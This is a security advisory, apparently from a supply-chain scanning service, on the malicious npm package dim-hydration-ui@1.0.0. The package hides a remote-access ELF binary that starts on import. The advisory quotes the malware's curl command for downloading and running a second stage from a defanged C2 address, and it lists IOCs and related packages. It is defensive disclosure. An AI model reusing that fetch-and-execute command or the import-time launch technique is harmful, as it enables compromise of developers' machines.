dim-hydration-ui@1.0.0
Malicious code in dim-hydration-ui (npm)
Analysis
dim-hydration-ui@1.0.0 masquerades as a calendar/streak math utility but bundles a 63KB Linux ELF (dist/internal/math.bin) that is a remote-access toolkit. Importing the package runs dist/index.mjs, which chmods the binary and spawns it detached in the background. The ELF provides: a port-forwarding mode (/portfwd start <lport> <rhost> <rport>), a reverse-shell / ELF-injection mode (/redshell elf -inject <pid> <filename>), and a second-stage downloader that fetches and executes a remote ELF from the C2 (curl -s -k -o /tmp/.elf_XXXXXX 'hxxp://217[.]60[.]77[.]63:<port>/Others/<file>' && chmod +x && run). It also performs external-IP discovery via api[.]ipify[.]org, fingerprints the host (hostname, uname, network interfaces, user), daemonizes via fork/setsid, and uses TLS (libssl.so.3). C2 IP: 217[.]60[.]77[.]63. Temp paths: /tmp/.sk, /tmp/.cr, /tmp/.elf_XXXXXX.
- analyzed by
- Leitwacht
- first seen
- Aug 24, 2026, 03:21 PM
- analyzed
- Aug 24, 2026, 03:22 PM
Related advisories
- @wizloft/harness-context@0.1.1-alpha.3
- tailwind-custom-templates@0.7.2
- bnpl-blocks-mobile-bnpl-faq@35.5.3
- dolyame-ui-filter@35.5.3
- devplatform-spa-plugin-notifier@35.5.7
- beaver-ui-actions-button@5.4.7
- snavbox@1.0.1
- dims-hydration-ui@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.